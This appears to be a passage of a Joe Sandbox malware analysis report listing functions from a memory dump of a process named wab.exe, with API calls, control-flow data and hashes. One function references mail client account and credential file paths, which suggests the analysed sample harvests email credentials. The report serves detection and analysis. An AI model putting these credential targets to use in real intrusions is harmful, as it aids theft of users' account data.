                                                • _free.LIBCMT ref: 222E92C1
                                                • _free.LIBCMT ref: 222E9315
                                                • _free.LIBCMT ref: 222E9320
                                                • _free.LIBCMT ref: 222E932B
                                                • _free.LIBCMT ref: 222E9336
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                • Instruction ID: a71fd6845ff853690bd215ce3a99d28cafefe20b234e1350681d1103b4c00fd7
                                                • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                • Instruction Fuzzy Hash: 99118131950B08FADA30ABB0DD46FCB7B9D9F14700FC00826A69F7605ADAA6B5247751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E8821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 488 222e8821-222e883a 489 222e883c-222e884c call 222e9341 488->489 490 222e8850-222e8855 488->490 489->490 497 222e884e 489->497 492 222e8857-222e885f 490->492 493 222e8862-222e8886 MultiByteToWideChar 490->493 492->493 495 222e888c-222e8898 493->495 496 222e8a19-222e8a2c call 222e2ada 493->496 498 222e88ec 495->498 499 222e889a-222e88ab 495->499 497->490 501 222e88ee-222e88f0 498->501 502 222e88ad-222e88bc call 222ebf20 499->502 503 222e88ca-222e88db call 222e56d0 499->503 505 222e8a0e 501->505 506 222e88f6-222e8909 MultiByteToWideChar 501->506 502->505 515 222e88c2-222e88c8 502->515 503->505 516 222e88e1 503->516 510 222e8a10-222e8a17 call 222e8801 505->510 506->505 509 222e890f-222e892a call 222e5f19 506->509 509->505 520 222e8930-222e8937 509->520 510->496 517 222e88e7-222e88ea 515->517 516->517 517->501 521 222e8939-222e893e 520->521 522 222e8971-222e897d 520->522 521->510 523 222e8944-222e8946 521->523 524 222e897f-222e8990 522->524 525 222e89c9 522->525 523->505 528 222e894c-222e8966 call 222e5f19 523->528 526 222e89ab-222e89bc call 222e56d0 524->526 527 222e8992-222e89a1 call 222ebf20 524->527 529 222e89cb-222e89cd 525->529 534 222e8a07-222e8a0d call 222e8801 526->534 542 222e89be 526->542 527->534 540 222e89a3-222e89a9 527->540 528->510 543 222e896c 528->543 533 222e89cf-222e89e8 call 222e5f19 529->533 529->534 533->534 546 222e89ea-222e89f1 533->546 534->505 545 222e89c4-222e89c7 540->545 542->545 543->505 545->529 547 222e8a2d-222e8a33 546->547 548 222e89f3-222e89f4 546->548 549 222e89f5-222e8a05 WideCharToMultiByte 547->549 548->549 549->534 550 222e8a35-222e8a3c call 222e8801 549->550 550->510
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,222E6FFD,00000000,?,?,?,222E8A72,?,?,00000100), ref: 222E887B
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,222E8A72,?,?,00000100,5EFC4D8B,?,?), ref: 222E8901
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 222E89FB
                                                • __freea.LIBCMT ref: 222E8A08
                                                  • Part of subcall function 222E56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 222E5702
                                                • __freea.LIBCMT ref: 222E8A11
                                                • __freea.LIBCMT ref: 222E8A36
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                • String ID:
                                                • API String ID: 1414292761-0
                                                • Opcode ID: 61625240d04e9fd4f500338af354f2e405385349dc579d15d0ee2e746281edf3
                                                • Instruction ID: 27fa976499f32b86885997c9b16d784524c978b6159fb7fe79debfc8dc1aa412
                                                • Opcode Fuzzy Hash: 61625240d04e9fd4f500338af354f2e405385349dc579d15d0ee2e746281edf3
                                                • Instruction Fuzzy Hash: 7F511972610307ABDB148E60CD44EBB37A9EB54754FD00628FD4ED6258EB3AFC50E662
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E15DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _strlen.LIBCMT ref: 222E1607
                                                • _strcat.LIBCMT ref: 222E161D
                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,222E190E,?,?,00000000,?,00000000), ref: 222E1643
                                                • lstrcatW.KERNEL32(?,?), ref: 222E165A
                                                • lstrlenW.KERNEL32(?,?,?,?,?,222E190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 222E1661
                                                • lstrcatW.KERNEL32(00001008,?), ref: 222E1686
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: lstrcatlstrlen$_strcat_strlen
                                                • String ID:
                                                • API String ID: 1922816806-0
                                                • Opcode ID: 62a49cd8823babd881dabcf41c3c586628f729a3fcc76c718e7054d59b29b886
                                                • Instruction ID: 5ff1009fc20c83cb1534af0ee8beb4735da618322eb5f28158409a0aed34c861
                                                • Opcode Fuzzy Hash: 62a49cd8823babd881dabcf41c3c586628f729a3fcc76c718e7054d59b29b886
                                                • Instruction Fuzzy Hash: EB210A36A00314ABC705DB54DC84EEE77B8EF8C710F54442AE909EB148DB35BA41E7A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E1000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrcatW.KERNEL32(?,?), ref: 222E1038
                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 222E104B
                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 222E1061
                                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 222E1075
                                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 222E1090
                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 222E10B8
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: lstrlen$AttributesFilelstrcat
                                                • String ID:
                                                • API String ID: 3594823470-0
                                                • Opcode ID: 00fb111d1292c26613706a71209ca321dad8b3ec82a8464acbcf6baa32f48cee
                                                • Instruction ID: f0d6da778e9a4e76571975b10a2cecd77b9b60ac5a78a25f5b33fc0a7ed2197e
                                                • Opcode Fuzzy Hash: 00fb111d1292c26613706a71209ca321dad8b3ec82a8464acbcf6baa32f48cee
                                                • Instruction Fuzzy Hash: 4821D1359003299BCF18DB60DD48ECB372CEF44324F4046A6E85AA31B9DA72BE85DB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E3856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(?,?,222E3518,222E23F1,222E1F17), ref: 222E3864
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 222E3872
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 222E388B
                                                • SetLastError.KERNEL32(00000000,?,222E3518,222E23F1,222E1F17), ref: 222E38DD
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: 723f4f962a963bc480f7e0feda47a9425cdacd4149c3d89268a4a606e83ff023
                                                • Instruction ID: 0e346ecdb01225748f0871383a9eedfd31a4cf1268dde49c4d91ad6e0f2578ee
                                                • Opcode Fuzzy Hash: 723f4f962a963bc480f7e0feda47a9425cdacd4149c3d89268a4a606e83ff023
                                                • Instruction Fuzzy Hash: 0D012D326087125DA60069756F88A761758EF15776BD0032EE52E5C0DDDF17B400B344
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E5AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(?,?,222E6C6C), ref: 222E5AFA
                                                • _free.LIBCMT ref: 222E5B2D
                                                • _free.LIBCMT ref: 222E5B55
                                                • SetLastError.KERNEL32(00000000,?,?,222E6C6C), ref: 222E5B62
                                                • SetLastError.KERNEL32(00000000,?,?,222E6C6C), ref: 222E5B6E
                                                • _abort.LIBCMT ref: 222E5B74
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free$_abort
                                                • String ID:
                                                • API String ID: 3160817290-0
                                                • Opcode ID: c99b87ac043f15034156026a0ff1588c58ea1153f4fef3f02876ebdb4e36da09
                                                • Instruction ID: ead2394b4a71d8ff0138d2be1a99a3443d40a66611d5225b53cd21ec235b1ab7
                                                • Opcode Fuzzy Hash: c99b87ac043f15034156026a0ff1588c58ea1153f4fef3f02876ebdb4e36da09
                                                • Instruction Fuzzy Hash: C2F0F971570701A6C2012E349E48F4B275D8FE1771B940128FD1F9618DFE6BB4227170
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E11EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 222E1E89: lstrlenW.KERNEL32(?,?,?,?,?,222E10DF,?,?,?,00000000), ref: 222E1E9A
                                                  • Part of subcall function 222E1E89: lstrcatW.KERNEL32(?,?), ref: 222E1EAC
                                                  • Part of subcall function 222E1E89: lstrlenW.KERNEL32(?,?,222E10DF,?,?,?,00000000), ref: 222E1EB3
                                                  • Part of subcall function 222E1E89: lstrlenW.KERNEL32(?,?,222E10DF,?,?,?,00000000), ref: 222E1EC8
                                                  • Part of subcall function 222E1E89: lstrcatW.KERNEL32(?,222E10DF), ref: 222E1ED3
                                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 222E122A
                                                  • Part of subcall function 222E173A: _strlen.LIBCMT ref: 222E1855
                                                  • Part of subcall function 222E173A: _strlen.LIBCMT ref: 222E1869
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                • API String ID: 4036392271-1520055953
                                                • Opcode ID: 71a8ea85c07739500d1d836e725e798a0b585e35567921ff7370103a1e4d9166
                                                • Instruction ID: 7cdd11e64e9cded4af84d002405d86137aa14029a51becf13f1911ef64f2b5b7
                                                • Opcode Fuzzy Hash: 71a8ea85c07739500d1d836e725e798a0b585e35567921ff7370103a1e4d9166
                                                • Instruction Fuzzy Hash: 0E21E979E10328AAE71497D4DC81FED7339EF40714F400556F60AEB1E8E6B23D808758
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E4B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,222E4AEA,?,?,222E4A8A,?,222F2238,0000000C,222E4BBD,00000000,00000000), ref: 222E4B59
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 222E4B6C
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,222E4AEA,?,?,222E4A8A,?,222F2238,0000000C,222E4BBD,00000000,00000000,00000001,222E2082), ref: 222E4B8F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 4e25621b3ee2ec61bba694648a6f9b16e35194ee4d8f52fcecc37d88502b61fe
                                                • Instruction ID: 5c991bcceb6f43e9282c28ae89095793f85e0eb4742ffb8c5480b58d726a6ce6
                                                • Opcode Fuzzy Hash: 4e25621b3ee2ec61bba694648a6f9b16e35194ee4d8f52fcecc37d88502b61fe
                                                • Instruction Fuzzy Hash: 39F03135940208AFDB119F50CD08B9E7FBDEF48355F404158F90AA6158DB36AA41EA50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E7153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 222E715C
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 222E717F
                                                  • Part of subcall function 222E56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 222E5702
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 222E71A5
                                                • _free.LIBCMT ref: 222E71B8
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 222E71C7
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                • String ID:
                                                • API String ID: 336800556-0
                                                • Opcode ID: 49cb9fa1c5b28841a2e0bbe2a4aded16c3c878d731cab09ba7e350178fe1ee60
                                                • Instruction ID: 7e7465269c8bb28bafda68030be5514048aba77c44fedd53572667b27474b6c1
                                                • Opcode Fuzzy Hash: 49cb9fa1c5b28841a2e0bbe2a4aded16c3c878d731cab09ba7e350178fe1ee60
                                                • Instruction Fuzzy Hash: A801D872611315BB27110ABA5C4CDFB3A6DDAC2AA4354052DBF09CB21CEA67BC01B1B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E5B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(00000000,?,00000000,222E636D,222E5713,00000000,?,222E2249,?,?,222E1D66,00000000,?,?,00000000), ref: 222E5B7F
                                                • _free.LIBCMT ref: 222E5BB4
                                                • _free.LIBCMT ref: 222E5BDB
                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 222E5BE8
                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 222E5BF1
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free
                                                • String ID:
                                                • API String ID: 3170660625-0
                                                • Opcode ID: 528dd3ecaa8f0257c3f25dba4e5804d28ce99b82fdbc293e5f89a1650f01d7ff
                                                • Instruction ID: cef4e532a329e7b32a22aeafb2334a0ba6af7a19c633ab709ae6a01f61006472
                                                • Opcode Fuzzy Hash: 528dd3ecaa8f0257c3f25dba4e5804d28ce99b82fdbc293e5f89a1650f01d7ff
                                                • Instruction Fuzzy Hash: 600126B2170702A682022E349E88E4F276D9BC16703D4012CFD1F9614DEE6BB8227070
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E1E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(?,?,?,?,?,222E10DF,?,?,?,00000000), ref: 222E1E9A
                                                • lstrcatW.KERNEL32(?,?), ref: 222E1EAC
                                                • lstrlenW.KERNEL32(?,?,222E10DF,?,?,?,00000000), ref: 222E1EB3
                                                • lstrlenW.KERNEL32(?,?,222E10DF,?,?,?,00000000), ref: 222E1EC8
                                                • lstrcatW.KERNEL32(?,222E10DF), ref: 222E1ED3
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: lstrlen$lstrcat
                                                • String ID:
                                                • API String ID: 493641738-0
                                                • Opcode ID: 9dc619f2bd374e8b242d0405d0584c2977ac0638cf92704a9380e58960833e6a
                                                • Instruction ID: 028b03677bb3db23381fae1b4cc0d1fde696e961227b4493627d8e5472bdda86
                                                • Opcode Fuzzy Hash: 9dc619f2bd374e8b242d0405d0584c2977ac0638cf92704a9380e58960833e6a
                                                • Instruction Fuzzy Hash: BDF08926140310BAD6253729EC89E7F777CEFC6B60B480419FA0C83194DB967D42A2B5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E91B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 222E91D0
                                                  • Part of subcall function 222E571E: HeapFree.KERNEL32(00000000,00000000,?,222E924F,?,00000000,?,00000000,?,222E9276,?,00000007,?,?,222E7E5A,?), ref: 222E5734
                                                  • Part of subcall function 222E571E: GetLastError.KERNEL32(?,?,222E924F,?,00000000,?,00000000,?,222E9276,?,00000007,?,?,222E7E5A,?,?), ref: 222E5746
                                                • _free.LIBCMT ref: 222E91E2
                                                • _free.LIBCMT ref: 222E91F4
                                                • _free.LIBCMT ref: 222E9206
                                                • _free.LIBCMT ref: 222E9218
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: b0b06290d215cc5c993d824d0aaa73415ae962fa5464dc980910cf12ab66e081
                                                • Instruction ID: 2f3c0aaf7dc2fa6a40b6d2c6e796b54c1735412cde2be9d504411cb3710a9a99
                                                • Opcode Fuzzy Hash: b0b06290d215cc5c993d824d0aaa73415ae962fa5464dc980910cf12ab66e081
                                                • Instruction Fuzzy Hash: 6BF0FFB1964381978630DE59DFC9C967BDDEB107647900C06EA0EEB50CCB3AF8A09A60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E5351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 222E536F
                                                  • Part of subcall function 222E571E: HeapFree.KERNEL32(00000000,00000000,?,222E924F,?,00000000,?,00000000,?,222E9276,?,00000007,?,?,222E7E5A,?), ref: 222E5734
                                                  • Part of subcall function 222E571E: GetLastError.KERNEL32(?,?,222E924F,?,00000000,?,00000000,?,222E9276,?,00000007,?,?,222E7E5A,?,?), ref: 222E5746
                                                • _free.LIBCMT ref: 222E5381
                                                • _free.LIBCMT ref: 222E5394
                                                • _free.LIBCMT ref: 222E53A5
                                                • _free.LIBCMT ref: 222E53B6
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 30e6372103825a21b55fb0ae7444ba1d67fd0663a33f0c159ce531c9f93fedcb
                                                • Instruction ID: a7da86ed0beeed30cbd15d44f38b60a217bf5548619b75b1e3db7d335627aca8
                                                • Opcode Fuzzy Hash: 30e6372103825a21b55fb0ae7444ba1d67fd0663a33f0c159ce531c9f93fedcb
                                                • Instruction Fuzzy Hash: BEF030708A5359DBC6115F289F894493BB9B7287703420A06FE169B26CDB7F2471EB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E4BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 222E4C1D
                                                • _free.LIBCMT ref: 222E4CE8
                                                • _free.LIBCMT ref: 222E4CF2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: _free$FileModuleName
                                                • String ID: C:\Program Files (x86)\windows mail\wab.exe
                                                • API String ID: 2506810119-3377118234
                                                • Opcode ID: 00728eab9eb7e32f3010beacf9e2b1f266c556e7c72ef5f01308ca3300f884aa
                                                • Instruction ID: b185a5586b96d18628f53bf3d50f96ddb7906809e93e863c52e12ba0e092f1f9
                                                • Opcode Fuzzy Hash: 00728eab9eb7e32f3010beacf9e2b1f266c556e7c72ef5f01308ca3300f884aa
                                                • Instruction Fuzzy Hash: E531C571A00349EFDB11CF99CE84D9EBBFCEB98314F504156E90A97208D677BA41EB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E86E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                Download Yara Rule
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,222E6FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 222E8731
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 222E87BA
                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 222E87CC
                                                • __freea.LIBCMT ref: 222E87D5
                                                  • Part of subcall function 222E56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 222E5702
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                • String ID:
                                                • API String ID: 2652629310-0
                                                • Opcode ID: b0946fc413bb9249532caa86aa4699cd682051ae5e6b598b2b6ffd0d3ff7d985
                                                • Instruction ID: a41d9187d7aef42d18dad986d014fbb208f667d0e856d202d6a5271b47054766
                                                • Opcode Fuzzy Hash: b0946fc413bb9249532caa86aa4699cd682051ae5e6b598b2b6ffd0d3ff7d985
                                                • Instruction Fuzzy Hash: DB31C23691030A9BDF148F64CD45DEF3BA5EB45314F810168FD0ADA1A4E736E950EB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E5CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,222E1D66,00000000,00000000,?,222E5C88,222E1D66,00000000,00000000,00000000,?,222E5E85,00000006,FlsSetValue), ref: 222E5D13
                                                • GetLastError.KERNEL32(?,222E5C88,222E1D66,00000000,00000000,00000000,?,222E5E85,00000006,FlsSetValue,222EE190,FlsSetValue,00000000,00000364,?,222E5BC8), ref: 222E5D1F
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,222E5C88,222E1D66,00000000,00000000,00000000,?,222E5E85,00000006,FlsSetValue,222EE190,FlsSetValue,00000000), ref: 222E5D2D
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: 8122297c5f76e383397d1e04d8dd6d0d1dd1f8f16599beb1d9b6a40144494709
                                                • Instruction ID: a631f6788b88487d5d188b54968500f64146c444ff5af29b92f02eea96947440
                                                • Opcode Fuzzy Hash: 8122297c5f76e383397d1e04d8dd6d0d1dd1f8f16599beb1d9b6a40144494709
